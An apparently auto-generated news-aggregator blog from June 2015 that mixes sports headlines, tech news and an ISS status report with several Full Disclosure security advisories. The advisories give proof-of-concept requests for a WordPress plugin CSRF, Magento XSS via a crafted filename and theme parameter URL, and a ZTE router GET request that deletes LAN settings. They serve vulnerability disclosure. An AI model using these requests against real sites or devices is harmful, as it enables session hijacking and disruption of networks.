Latest YouTube Video

Saturday, June 20, 2015

How to create a block for anonymous uses to enter their contact info

Hello, I am trying to create a block with the below fields: Name, PhoneNo, Email, Message Anonymous users can enter these info. Then they can click ...

from Google Alert - anonymous http://ift.tt/1RkFqCf
via IFTTT

How do I write an anonymous callback function as a second parameter?

Hey Chris,. You have everything right in your actual code. The only reason why the challenge won't pass is that you're missing an ! on the goodbye ...

from Google Alert - anonymous http://ift.tt/1fplClr
via IFTTT

Germany beats Sweden, China ousts Cameroon at WWCup

OTTAWA, Ontario (AP) Germany provided a dominating reminder of why it is deserving of its favorite tag at the Women's World Cup by beating Sweden 4-1 on Saturday to progress to the quarterfinals.

from FOX Sports Digital http://ift.tt/1QJLFEH
via IFTTT

Argentina beats Jamaica to finish 1st in Copa America group

VINA DEL MAR, Chile (AP) Argentina defeated Jamaica 1-0 in Lionel Messi's 100th game with the national team on Saturday, securing first place in its Copa America group.

from FOX Sports Digital http://ift.tt/1LmaVNH
via IFTTT

HR Answers

What resources should a company provide managers to train their employees? By Anonymous. ago. Categories: HSA, Contributions ...

from Google Alert - anonymous http://ift.tt/1Gr8ulE
via IFTTT

Paraguay, Uruguay draw 1-1 and advance to Copa quarters

LA SERENA, Chile (AP) Defending champion Uruguay and Paraguay drew 1-1 in their last group game and both advanced to the Copa America quarterfinals on Saturday.

from FOX Sports Digital http://ift.tt/1Gz8pPX
via IFTTT

Orioles Highlight: Darren O'Day escapes bases-loaded jam in 8th, Manny Machado 2-run double in 9th in win over Blue Jays (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous on Twitter: "Please join #Anomymous in support of Jeremy Hammond and in protest of ...

Signal boost for Anonymous operations, resistance movements, & journalism. #RobertDoggart. Right behind you. youranonnews.tumblr.com ...

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/YourAnonNews/status/611937127933194240&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNFxieeZmaCJZCEIF40wkLx3Cb5Iug
via IFTTT

Brazil will appeal Neymar's Copa America suspension

SANTIAGO, Chile (AP) Brazil will appeal Neymar's four-game suspension that rules him out of the rest of the Copa America.

from FOX Sports Digital http://ift.tt/1dVZbDt
via IFTTT

Orioles: RHP Kevin Gausman reinstated from 15-day DL; RHP Mychal Givens up from Triple-A; RHP Jason Garcia on 60-day DL (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Russian minister: Money not in the way of firing Capello

MOSCOW (AP) Money will be no object if Russia decides to fire national football team coach Fabio Capello, despite reports he could be due up to $24 million in compensation, the country's sports minister says.

from FOX Sports Digital http://ift.tt/1L9IeCC
via IFTTT

Urawa Reds win J-League's first-stage title after 1-1 draw

KOBE, Japan (AP) Urawa Reds won the J-League's first-stage title on Saturday after drawing 1-1 at Vissel Kobe.

from FOX Sports Digital http://ift.tt/1K2fL2f
via IFTTT

This Simple Trick Requires Only Your Phone Number to Hack your Email Account

We all have been receiving spam phone calls and messages on almost daily basis from scammers who want to pilfer your money and personal information, but a new type of social engineering hack that makes use of just your mobile number to trick you is a little scarier. Security firm Symantec is warning people about a new password recovery scam that tricks users into handing over their webmail


from The Hacker News http://ift.tt/1QI7e8K
via IFTTT

Serbia coach hopes for national unity after World Cup win

AUCKLAND, New Zealand (AP) Serbia coach Veljko Paunovic hoped his team's victory at the Under-20 World Cup will help inspire ''compassion and unity'' in a country still troubled by its war-torn past.

from FOX Sports Digital http://ift.tt/1K23bjI
via IFTTT

5G Mobile Networks to Offer Speed Up To 20Gbps

While many of us are battling with the slow data access and still awaiting the roll-out of 4G Networks, the International Telecommunication Union (ITU) is already looking forward to the next generation of telecommunication network technology. Yes folks, we are talking about the future 5G standard for mobile networking. Since 5G standard is currently in the definition stage, the ITU has


from The Hacker News http://ift.tt/1RiHE4Z
via IFTTT

Serbia beats Brazil 2-1 in Under-20 World Cup final

AUCKLAND, New Zealand (AP) Nemanja Maksimovic scored in the 117th minute to give Serbia a surprise 2-1 win over Brazil on Saturday in the final of the Under-20 World Cup.

from FOX Sports Digital http://ift.tt/1L8VWpd
via IFTTT

Platini has big decision in great game for FIFA throne

GENEVA (AP) After years of waiting, Michel Platini's destiny with FIFA is coming faster than he thought.

from FOX Sports Digital http://ift.tt/1Cj4lzj
via IFTTT

3rd place: Mali gets 3 late goals, beats Senegal at U20 WCup

AUCKLAND, New Zealand (AP) Mali claimed third place at the Under-20 World Cup with a 3-1 win over 10-man Senegal in a dramatic and foul-ridden match on Saturday.

from FOX Sports Digital http://ift.tt/1QHCV21
via IFTTT

Friday, June 19, 2015

Orioles Video: PH Jimmy Paredes spoils Marco Estrada's no-hit bid with bloop single in 8th in 5-4 loss to Blue Jays (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Brazil's Neymar banned for rest of Copa America

SANTIAGO, Chile (AP) Brazilian star Neymar was banned for the rest of the Copa America on Friday, stripping the tournament of one of its biggest stars.

from FOX Sports Digital http://ift.tt/1NbDrzN
via IFTTT

Chile routs Bolivia to finish 1st in its Copa America group

SANTIAGO, Chile (AP) Charles Aranguiz scored twice and Alexis Sanchez added another goal on Friday to help Copa America host Chile defeat Bolivia 5-0 and advance from the group stage in first place.

from FOX Sports Digital http://ift.tt/1J9fN8m
via IFTTT

[FD] Cross-Site Request Forgery in Google Analyticator Wordpress Plugin v6.4.9.3 before rev @1183563

# Title: Cross-Site Request Forgery in Google Analyticator Wordpress Plugin v6.4.9.3 before rev @1183563 # Submitter: Nitin Venkatesh # Product: Google Analyticator Wordpress Plugin # Product URL: http://ift.tt/1kbcdeO # Vulnerability Type: Cross-Site Request Forgery [CWE-352] # Affected Versions: v6.4.9.3 before rev @1183563 and possibly earlier # Tested versions: v6.4.9.3 rev @1168849 # Fixed Version: v6.4.9.3 rev @1183563 # Link to code diff: http://ift.tt/1fmTGhZ # CVE Status: None/Unassigned/Fresh ## Product Information: Google Analyticator makes it super easy to view Google Analytics within your WordPress dashboard. This eliminates the need to edit your template code to begin logging. Google Analyticator also includes several widgets for displaying Analytics data in the admin and on your blog. One of the most popular WordPress plugins for Google Analytics! Over 3.5+ million downloads. ## Vulnerability Description: The administrative actions allowed by the plugin can be exploited using CSRF which could be used to disrupt the functionality provided by the plugin. ## Proof-of-Concept: http://localhost/wp-admin/options-general.php?page=google-analyticator.php&pageaction=ga_clear_cache http://localhost/wp-admin/options-general.php?page=ga_reset ## Solution: Upgrade to v6.4.9.3 rev @1183563 ## Disclosure Timeline: 2015-05-30 - Contacted developer via forums. 2015-06-02 - Vulnerability details submitted on the forums on developer's request - http://ift.tt/1CiBKtU 2015-06-13 - Re-contacted developer on the forums. 2015-06-18 - Update released. 2015-06-19 - Publishing to Full Disclosure mailing list ## Disclaimer: This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.

Source: Gmail -> IFTTT-> Blogger

[FD] IBM Domino Web Server Cross-site Scripting Vulnerability (CVE-2015-1981)

Hello list! Earlier I wrote about XSS vulnerability in IBM Domino (http://ift.tt/1Jgogoz). I informed IBM in May about it and at 17.06.2015 they fixed it and released security bulletin. Security Bulletin: IBM Domino Web Server Cross-site Scripting Vulnerability (CVE-2015-1981) http://ift.tt/1fmTG1J. CVE ID: CVE-2015-1981.

Source: Gmail -> IFTTT-> Blogger

Mexico eliminated from Copa America in 2-1 loss to Ecuador

RANCAGUA, Chile (AP) Mexico was eliminated from the Copa America on Friday with a 2-1 loss to Ecuador in the final Group A match in the Copa America.

from FOX Sports Digital http://ift.tt/1I3NBT2
via IFTTT

Orioles: Adam Jones in lineup as DH, batting 3rd Friday vs. Blue Jays; missed last 3 games with sore right shoulder (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Neymar banned for rest of Copa America for violent conduct

SANTIAGO, Chile (AP) Brazilian star Neymar has been banned for the rest of the Copa America, depriving the tournament of one of its biggest stars.

from FOX Sports Digital http://ift.tt/1Go7P4j
via IFTTT

Ravens: Jamison Hensley on the rookies who could start this season, including WR Breshad Perriman, TE Maxx Williams (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ex-England, Chelsea striker Kerry Dixon jailed for assault

LUTON, England (AP) Former England striker Kerry Dixon has been jailed for nine months after being found guilty of assault.

from FOX Sports Digital http://ift.tt/1d5YbvK
via IFTTT

Aulas ready to spend big to keep Lacazette

LYON, France (AP) Lyon president Jean-Michel Aulas is ready to open his wallet to keep Alexandre Lacazette at the French league runner-up.

from FOX Sports Digital http://ift.tt/1LjHLi8
via IFTTT

Free Encryption Project to issue First SSL/TLS Certificates Next Month

Let's Encrypt, a project aimed to provide free-of-charge and easier-to-implement way to obtain and use a digital cryptographic certificates (SSL/TLS) to secure HTTPS website, is looking forward to issue its first digital certificates next month. With Let's Encrypt, any webmaster interested in implementing HTTPS for their services can get the certificates for free, which is a great move for


from The Hacker News http://ift.tt/1I1JyXc
via IFTTT

[FD] Ebay Magento Bug Bounty #12 - Cross Site Request Forgery Web Vulnerability

Document Title: =============== Ebay Magento Bug Bounty #12 - Cross Site Request Forgery Web Vulnerability References (Source): ==================== http://ift.tt/1JXH6RJ Video: http://ift.tt/1IkusYN View Video: https://www.youtube.com/watch?v=x7uaABfxxU0 EIBBP-31602 Release Date: ============= 2015-06-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1460 Common Vulnerability Scoring System: ==================================== 2.5 Product & Service Introduction: =============================== Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites. Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away. ( Copy of the Vendor Homepage: http://ift.tt/1E22539 & http://ift.tt/1E22539 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a client-side cross site request forgery web vulnerability in the official Magento Commerce web-application. Vulnerability Disclosure Timeline: ================================== 2015-03-17: Researcher Notification & Coordination (Hadji Samir) 2015-03-18: Vendor Notification (eBay Inc Security Team - Bug Bounty Program) 2015-04-18: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program) 2015-05-19: Vendor Fix/Patch (Magento Developer Team) 2015-05-21: Bug Bounty Reward (eBay Inc Security Team - Bug Bounty Program) 2015-06-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ebay Inc. Product: Magento - Connect Web Application 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A client-side cross site request forgery vulnerability vulnerability has been discovered in the official Magento Commerce web-application. The vulnerability allows to execute unauthorized client-side application functions without secure validation or session token protection mechanism. Th vulnerability is located in the `create messages` input of the `magento-connect/message/message/create/` module. Remote attackers with low privilege user accounts are able to delete internal magento messages of other users without authorization. The attacker can for example intercept the session to delete all exisiting messages. The type of issue was disclosed to the phpbb board some years ago. The security risk of the cross site request forgery vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5. Exploitation of the vulnerability requires a low privilege web-application user account and low user interaction. Successful exploitation of the vulnerability results in unauthorized delete or add of magento connect service panel messages. Vulnerable Module(s): [+] magento-connect/message/message/create/ Proof of Concept (PoC): ======================= The client-side cross site request forgery web vulnerability can be exploited by remote attackers without privileged application user account and with medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Login to magento connect 2. Open the send message module 3. Switch to the code review and watch the vulnerable source 4. Follow the steps in the video to recreate the csrf attack! Note: Tamper the session to intercept the url in a browser 5. Successful reproduce of the security vulnerability! PoC: Vulnerable Source

[FD] Ebay Magento Bug Bounty #10 - Persistent Filename Vulnerability

Document Title: =============== Ebay Magento Bug Bounty #10 - Persistent Filename Vulnerability References (Source): ==================== http://ift.tt/1Lhexxk eBay Inc. Bug Bounty Program ID: EIBBP-31603 Video: https://www.youtube.com/watch?v=WffsHd8pibE Release Date: ============= 2015-06-16 Vulnerability Laboratory ID (VL-ID): ==================================== 1457 Common Vulnerability Scoring System: ==================================== 3.7 Product & Service Introduction: =============================== Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites. Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away. ( Copy of the Vendor Homepage: http://ift.tt/1E22539 & http://ift.tt/1E22539 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered an applicationb-side input validation web vulnerability in the official Magento Commerce web-application. Vulnerability Disclosure Timeline: ================================== 2015-03-17: Researcher Notification & Coordination (Hadji Samir) 2015-03-18: Vendor Notification (eBay Inc Security Team - Bug Bounty Program) 2015-04-07: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program) 2015-05-21: Vendor Fix/Patch (Magento Developer Team) 2015-06-16: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ebay Inc. Product: Magento - Connect Web Application 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Magento xCommerce web-application. The vulnerability allows remote attackers to inject own script code to the application-side of the affected service module. The vulnerability is located in the `filename` value of the image upload module. The attacker needs to create a `New Message` with upload to change the filename to a malicious payload. The attack vector of the issue is located on the application-side and the request method to inject the script code is POST. The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.7. Exploitation of the persistent web vulnerability requires a low privileged web-application user account and low or medium user interaction. Successful exploitation of the application-side vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation affected or connected module context. Vulnerable Domain(s): [+] http://ift.tt/gRsn9E (Magento Connect) Request Method(s): [+] POST Vulnerable Module(s): [+] New Message Vulnerable Parameter(s): [+] filename Proof of Concept (PoC): ======================= The application-side input validation web vulnerability can be exploited by remote attackers with low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the security vulnerability ... 1. Login to the magento connect service 2. create a new message 3. Start a session tamper to intercept session data - http://ift.tt/1FqWzDn 4. Click to Drop the file and upload it with a payload as filename ">.png 5. Save the request and the execution occurs in the same location! 6. Successful reproduce of the application-side input validation web vulnerability in the upload POST method request! PoC: magento-connect session GET
poc video :https://www.youtube.com/watch?v=IXn2BpcFdgs

Source: Gmail -> IFTTT-> Blogger

ISS Daily Summary Report – 6/18/15

Microgravity Science Glovebox (MSG) Cleanup and Reconfiguration: Kelly completed the second and final MSG cleanup session following the completion of RR2.  Following cleanup, Padalka installed the Observation Analysis of Smectic Islands in Space (OASIS) experiment hardware.  The sample installation, final connections and camera checkout will be scheduled on another day.  OASIS studies the unique behavior of liquid crystals in microgravity, including their overall motion and the merging of crystal layers known as smectic islands. Liquid crystals are used for display screens in televisions and clocks and they also occur in soaps and cell membranes. The experiment allows detailed studies of the behavior of these structures, and how microgravity affects their unique ability to act like both a liquid and a solid crystal. Ocular Health: Kelly and Kornienko executed their Flight Day 90 Ocular Health activities today including Optical Coherence Tomography (OCT) to measure retinal thickness, volume, and retinal nerve fiber layer and Fundoscope measurements to collect retinal images.   For these operations, Padalka assisted Kelly and Kelly was the Crew Medical Officer for Kornienko. The Ocular Health protocol calls for a systematic gathering of physiological data to characterize the risk of microgravity-induced visual impairment/intracranial pressure in ISS crewmembers. Radiation Dosimetry Inside ISS-Neutrons (RADI-N):  Kelly retrieved the eight RADI-N detectors from their deployed locations and handed them over to Kornienko for downlink of the data. The objective of this investigation is to better characterize the ISS neutron environment and define the risk posed to the crewmembers’ health and provide the data necessary to develop advanced protective measures for future space flight.  ISS Reboost: The ISS performed a reboost at 5:59 am CDT today using 58P thrusters.  This reboost was added to the timeline as the result of 43S Soyuz launch date moving from July 24 to July 22.  A second reboost is planned for July 10 to finalize setup for 43S Soyuz 4-orbit launch. Delta-V was 0.5 meters/second and burn duration was 4 minutes, 8 seconds. Today’s Planned Activities All activities were completed unless otherwise noted. Closing USOS Window Shutters Closure of outer shutters on SM windows 6, 8, 9, 12, 13, 14 for ISS Reboost Optical Coherence Tomography (OCT) Setup Rodent Research (RR) – Hardware Removal and Cleaning Preparations for Replacement of РТ-50-1М No.4 and No.1 (А204, А211). OCT Exam OASIS – Hardware Gathering MATRYOSHKA-R. BUBBLE-dosimeter gathering and measurements. OASIS – Setup RADIN – Retrieval of dosimeters from deployed locations MATRYOSHKA-R. Receiving BUBBLE-dosimeter detectors from USOS. RADIN – Handover of Dosimeters to the Russian Crew MATRYOSHKA-R. BUBBLE-dosimeter gathering and measurements. Manual synchronization of the time on the CEVIS Control Panel with the LS1 server OCT Exam OCT Equipment Stowage  OASIS – Setup СОЖ Maintenance VZAIMODEISTVIYE-2. Experiment Ops Cleaning of TVS LIV voltage converter vent grille VZAIMODEISTVIYE-2. Experiment Ops Fundoscope Setup and OCT Laptop Configuration Ocular Health – Fundoscope Prep IMS Delta File Prep HABIT – iPad S/W Update Fundoscope – Eye Exam Tightening of Progress 425 SM (Aft) QD Screw Clamps Preparing for Fundoscope Exam Fundoscope – Eye Exam Fundoscope Removal and Stowage  Completed Task List Items None  Ground Activities All activities were completed unless otherwise noted. Ocular Health ops OASIS hardware setup Three-Day Look Ahead: Friday, 06/19: Ocular Health, CUCU/CCP checkout, SPX-7 OBT RoBOT training Saturday, 06/20: Crew off duty, housekeeping Sunday, 06/21: Crew off duty QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1ChcsfI
via IFTTT

[FD] Ebay Magento Bug Bounty #17 - Client Side Cross Site Scripting Web Vulnerability

Document Title: =============== Ebay Magento Bug Bounty #17 - Client Side Cross Site Scripting Web Vulnerability References (Source): ==================== http://ift.tt/1JXH6RE EIBBP-31541 Release Date: ============= 2015-06-15 Vulnerability Laboratory ID (VL-ID): ==================================== 1473 Common Vulnerability Scoring System: ==================================== 3 Product & Service Introduction: =============================== Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites. Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away. ( Copy of the Vendor Homepage: http://ift.tt/1E22539 & http://ift.tt/1E22539 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a client-side cross site request forgery web vulnerability in the official Magento Commerce online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-02-20: Researcher Notification & Coordination (Hadji Samir) 2015-02-21: Vendor Notification (Magento Team - Bug Bounty Program) 2015-03-10: Vendor Response/Feedback (Magento Security Team - Bug Bounty Program) 2015-05-12: Vendor Fix/Patch (Magento Developer Team) 2015-06-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ebay Inc. Product: Magento - Premium Themes 2015 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A client-side cross site scripting web vulnerability has been discovered in the official Magento Commerce Premium Theme front-end web-application. The non-persistent xss vulnerability allows remote attackers to inject own script code to the application-side of the vulnerable online-service module. The vulnerability is located in the `general_front` values of the `/css/theme.less.php` front-end template file. Remote attackers are able to inject own script codes to client-side application requests. The attack vector is non persistent and the request method to inject/execute is GET. The vulnerable source is located in the magento premium theme and the stable release. The security risk of the cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0. Exploitation of the cross site scripting web vulnerability requires no privileged web application user account and no user interaction. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of affected or connected service modules. Request Method(s): [+] GET Vulnerable Module(s): [+] css/less Vulnerable File(s): [+] theme.less.php Vulnerable Parameter(s): [+] general_front Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account and with low user interaction(click). For security demonstration or to reproduce the security vulnerability follow the provided infomation and steps below to continue. Vulnerable Source(s): http://www.gutzzi.com/skin/frontend/default/em0121/css/less/theme.less.php?%40variables_url=%22http%3A%2F%2Fwww.gutzzi.com%2Fskin%2Ffrontend%2Fdefault%2Fem0121%2Fcss%2Fless%2Ftheme.less%22&%40function_url=%22http%3A%2F%2Fwww.gutzzi.com%2Fskin%2Ffrontend%2Fdefault%2Fem0121%2Fcss%2Fless%2Ffunctions.less%22&%40screen-large-desktop=1200px&%40screen-desktop=992px&%40screen-tablet=768px&%40desktop=%7E%22%28max-width%3A+767px%29%22&%40tablet=%7E%22only+screen+and+%28min-width%3A+720px%29+and+%28max-width%3A+959px%29%22&%40page_bg_color=%23ffffff&%40page_bg_position=%7E%220+0%22&%40page_bg_repeat=repeat&%40box_shadow=%7E%220+0+5px+0+%23c4c4c3%22&%40rounded_corner=0&%40general_font=%7E%22normal+13px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40h1_font=%7E%22normal+22px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40h2_font=%7E%22normal+20px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40h3_font=%7E%22normal+18px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40h4_font=%7E%22normal+16px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40h5_font=%7E%22normal+14px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40h6_font=%7E%22normal+12px%2F1.35+Raleway%2Chelvetica%2Carial%2Csans-serif%22&%40header_bg_color=%23ffffff&%40header_bg2_color=%23a4d0d9&%40header_bg3_color=%23ffffff&%40header_bg4_color=%23eff7f8&%40header_bg5_color=%23a4d0d9&%40header_bg_position=%7E%220+0%22&%40header_bg_repeat=repeat&%40header_text_color=%23999999&%40header_text2_color=%23686868&%40header_text4_color=%23ffffff&%40header_text5_color=%23000000&%40header_line_color=%23eaeaea&%40topmenu_text_color=%23999999&%40topmenu_hover_text_color=%23686868&%40topmenu_line_color=%23a4d0d9&%40topmenu_font=%7E%22500+15px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40dropmenu_bg_color=%23ffffff&%40dropmenu_text_color=%23666666&%40dropmenu_text2_color=%23a4d0d9&%40dropmenu_line_color=%23d3d3d3&%40dropmenu_font=%7E%22normal+13px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40body_bg_color=%23ffffff&%40body_bg2_color=%23ffffff&%40body_bg3_color=%23ffffff&%40body_bg4_color=%23abd4dc&%40body_bg6_color=%23f6f6f6&%40body_bg_position=%7E%220+0%22&%40body_bg_repeat=repeat&%40body_text_color=%23ffffff&%40body_text2_color=%23666666&%40body_text3_color=%23686868&%40body_text4_color=%23999999&%40body_text5_color=%23abd4dc&%40body_text6_color=%23ff8401&%40body_line_color=%23d1d1d1&%40body_line2_color=%23eaeaea&%40body_line3_color=%23abd4dc&%40title_font=%7E%22500+15px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40footer_bg_color=%23ffffff&%40footer_bg2_color=%23a4d0d9&%40footer_bg3_color=%23999999&%40footer_bg4_color=%23f2f2f2&%40footer_bg_position=%7E%220+0%22&%40footer_bg_repeat=repeat&%40footer_text_color=%23666666&%40footer_text2_color=%23000000&%40footer_text3_color=%23a4d0d9&%40footer_text4_color=%23999999&%40footer_text5_color=%23ffffff&%40footer_line_color=%23d9d9d9&%40btn1_bg_color=%23a4d0d9&%40btn1_text_color=%23ffffff&%40btn1_line_color=%23a4d0d9&%40btn1_font=%7E%22500+13px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40btn2_bg_color=%23686868&%40btn2_text_color=%23ffffff&%40btn2_line_color=%23686868&%40btn2_font=%7E%22500+13px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40image_bg_url=%7E%22http%3A%2F%2Fwww.gutzzi.com%2F%22&%40page_bg_image=%7E%22skin%2Ffrontend%2Fdefault%2Fem0121%2Fimages%2Fstripes%2Fblank.gif%22&%40header_bg_image=%7E%22skin%2Ffrontend%2Fdefault%2Fem0121%2Fimages%2Fstripes%2Fblank.gif%22&%40body_bg_image=%7E%22skin%2Ffrontend%2Fdefault%2Fem0121%2Fimages%2Fstripes%2Fblank.gif%22&%40footer_bg_image=%7E%22skin%2Ffrontend%2Fdefault%2Fem0121%2Fimages%2Fstripes%2Fblank.gif%22" PoC(s): http://ift.tt/1dO54T7 http://ift.tt/1JZDi3K http://ift.tt/1dO54T9 http://ift.tt/1JZDgZVhttp://ift.tt/1JZDgZX http://ift.tt/1dO54Tb http://ift.tt/1GCOeCC http://ift.tt/1dO54Tc http://ift.tt/1dO54Tc http://ift.tt/1JZDhgd http://ift.tt/1dO559q http://ift.tt/1dO54Tb http://ift.tt/1JZDhgf http://ift.tt/1dO559s Solution - Fix & Patch: ======================= Restrict the input of the general_font value by disallowing the usage of special chars. Encode and parse the vulnerable file parameters to prevent client-side script code injection attacks. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the frontend is estimated as medium. (CVSS 3.0) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete Vulnerability

Document Title: =============== ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete Vulnerability References (Source): ==================== http://ift.tt/1GbmO1o Release Date: ============= 2015-06-16 Vulnerability Laboratory ID (VL-ID): ==================================== 1522 Common Vulnerability Scoring System: ==================================== 6 Product & Service Introduction: =============================== ZTE zxv10 w300 ADSL wireless router cat family gateway (accessories include a host, a power line, a line of 1 root, separator, 1) (Copy of the Vendor Homepage: http://ift.tt/1cWWrCh ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a remote vulnerability in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware. Vulnerability Disclosure Timeline: ================================== 2015-06-16: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== ZTE Corporation Product: ZTE ZXV10 W300 3.1.0c_DR0 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A session vulnerability has been discovered in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware. The security vulnerability allows remote attackers to block/shutedown or delete network settings and components. The LAN configuration post to /Forms/home_lan_1 and the page /home_lan_1 that stores the configuration of the router. Attackers can request via GET method the /Forms/home_lan_1 path and the modem will delete all the LAN configurations automatically. The problem is the GET method request with the /Forms/home_lan_1 path that deletes all the configurations. A hard reset is required after successful exploitation of the issue. The security risk of the router ui web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.0. Exploitation of the security web vulnerability requires no privilege web-application user account and low user interaction (click link). Successful exploitation of the vulnerability results in reset of the modem device, shutdown of the network/lan or compromise of running services. Request Method(s): [+] POST Vulnerable Module(s): [+] Forms/ Affected Module(s): 